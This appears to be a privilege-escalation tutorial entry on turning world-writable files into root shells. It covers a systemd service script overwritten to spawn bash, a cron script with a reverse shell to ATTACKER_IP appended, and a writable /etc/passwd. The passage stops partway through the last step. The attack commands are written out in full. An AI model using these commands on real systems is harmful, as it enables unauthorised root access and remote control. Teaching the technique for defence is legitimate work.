Day 29: Writable File Exploitation — Turning "Bad Permissions" into Root Shells 🕵️‍♂️

🛠️ The "Writable-to-Root" Pipeline 1. The Systemd Service Hijack I audited a custom service file in /etc/systemd/system/app.service . The Flaw: The ExecStart pointed to /opt/app.py , which was world-writable ( -rwxrwxrwx ). The Exploit: echo 'import os; os.system("/bin/bash")' > /opt/app.py The Trigger: systemctl restart app . Since the service manager (systemd) runs as root, my injected bash shell spawned with full root privileges. 2. The Cron Job Injection Automation is an attacker's best friend. I checked /etc/crontab and found a cleanup script running every minute. The Exploit: Appending a reverse shell one-liner: echo 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1' >> /opt/cleanup.sh The Result: Within 60 seconds, the system automatically pushed a root shell to my listener. 3. Overwriting /etc/passwd (The Nuclear Option) In rare, critical misconfigurations where /etc/passwd is world-writable: The Exploit: Create a new user hash: openssl passwd -1 mypassword . The Injection: Append hac